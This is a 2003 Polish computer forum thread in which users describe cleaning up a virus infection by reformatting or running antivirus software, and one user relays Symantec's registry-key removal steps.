seryjny samobójca

Posty: 5225
Dołączył(a): 19.04.2003
Lokalizacja: Bielsko-Biała

Post 11.10.2003, 12:26:56

Miałem tego gnojka, musiałem format robić :evil:
Avatar użytkownikaŚwistu
Paweł Zardzewiały

post's killer

Posty: 2960
Dołączył(a): 15.08.2003

Post 11.10.2003, 13:12:45

Świstu napisał(a):Miałem tego gnojka, musiałem format robić :evil:


No comments...

Ja kiedyś (bardzo dawno) temu miałem i AVG mi go usunął :).
Avatar użytkownikaAnoniM_MC
Iwo Mateusz

Mroczny miś

Posty: 3523
Dołączył(a): 29.09.2002
Lokalizacja: Szczecin

Post 11.10.2003, 13:42:37

skierowanie mnie na jakies b dobre forum gdzie mi pmoga


Ja polecam mks forum - tam (tak mi się wydaje) są specjaliście od tych spraw :wink:
Tani hosting za granicą dreamhost.com - maksymalna zniżka 50$ na kod: GASTA
Avatar użytkownikaLEXUS
Posty: 1280
Dołączył(a): 10.08.2003
Lokalizacja: Łódź

Post 11.10.2003, 15:52:01

Musiałem sformatować - wyobrażacie sobie, ile czasu czyściłoby kilkadziesiąt gb plików?
Avatar użytkownikaŚwistu
Paweł Zardzewiały

post's killer

Posty: 2960
Dołączył(a): 15.08.2003

Post 12.10.2003, 10:29:32

zgodnie z zaleceniami symanteca, należy dokonać następujących zmian w rejestrze (prócz usunięcia wirusa nav-em):

1. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run >> usunąć wartość "Kernel32"
2. HKCU\Identities\[Default Use ID]\Software\
Microsoft\Outlook Express\[Outlook Version].0\Mail >> usuń wartości "Compose Use Stationery", "Stationery Name", "Wide Stationery Name"
3. HKCU\Software\Microsoft\Office\9.0\Outlook\Options\Mail >> skasuj wartość "EditorPreference"
4. skasuj klucze:
HKCR\dllFile\Shell
HKCR\dllFile\ShellEx
HKCR\dllFile\ScriptEngine
HKCR\dllFile\ScriptHostEncode
5. wirus zaraża pliki .html, .htm, .asp, .php, .jsp, and .vbs

reszta to opis działania wirusa.

pozdrawiam.
Avatar użytkownikas4
Rafał Drąg

seryjny samobójca
seryjny samobójca

Posty: 5225
Dołączył(a): 19.04.2003
Lokalizacja: Bielsko-Biała


Powrót do Oprogramowanie i Komputery


 


  • Podobne wątki
    Odpowiedzi
    Wyświetlone
    Ostatni post

Kto przegląda forum

Użytkownicy przeglądający ten dział: Brak zidentyfikowanych użytkowników i 2 gości

Hosting, Domeny, SSL

Subskrypcja

Mamy 52012 zarejestrowanych użytkowników.
Najnowszy użytkownik: domenki123


Nasi użytkownicy napisali:

  • 938321 wiadomości
  • w 247833 tematach

Najnowsze wpisy na blogu

Najnowsze artykuły

Najaktywniejsi (ostatnie 30 dni)